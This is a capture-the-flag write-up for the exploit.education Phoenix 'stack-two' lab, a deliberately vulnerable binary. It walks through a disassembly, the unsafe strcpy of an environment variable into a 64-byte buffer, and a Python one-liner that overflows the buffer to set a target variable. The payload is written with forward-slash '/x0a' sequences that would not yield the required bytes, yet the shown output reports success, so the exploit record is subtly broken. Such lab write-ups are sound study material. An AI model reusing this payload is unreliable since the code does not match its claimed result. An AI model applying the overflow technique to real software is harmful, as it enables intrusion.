exploit.education Phoenix - Stack 0x2

Write-up for: Stack Two

Running the binary reveals that we need to change an environment variable

user@phoenix-amd64:/opt/phoenix/i486$ ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
stack-two: please set the ExploitEducation environment variable

After setting the variable, the output changes

export ExploitEducation=AAAA
user@phoenix-amd64:/opt/phoenix/i486$ ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Almost! changeme is currently 0x00000000, we want 0x0d0a090a

Looking at the disassembly of the main function we can see where the environment variable is stored:

0x0804856e      e8edfdffff     call sym.imp.getenv        ; char *getenv(const char *name);
|           0x08048573      83c410         add esp, 0x10
|           0x08048576      8945f4         mov dword [ebp - local_ch], eax

[ebp - local_ch] which is at ebp - 0x0C.

This variable is later used in an unsafe call to strcpy where the content of the environment variable is copied to ebp - local_50h or ebp-0x50. For the success check, the value at ebp - 0x10 is compared to 0xd0a090a. We need a way to write to ebp - 0x10.

The buffer size is 64 bytes. Thus we need to write 64 bytes + the 4 required bytes.

Exploit

user@phoenix-amd64:/opt/phoenix/i486$ export ExploitEducation=`python -c 'print "A"*64 + "/x0a/x09/x0a/x0d"'`         
user@phoenix-amd64:/opt/phoenix/i486$ ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value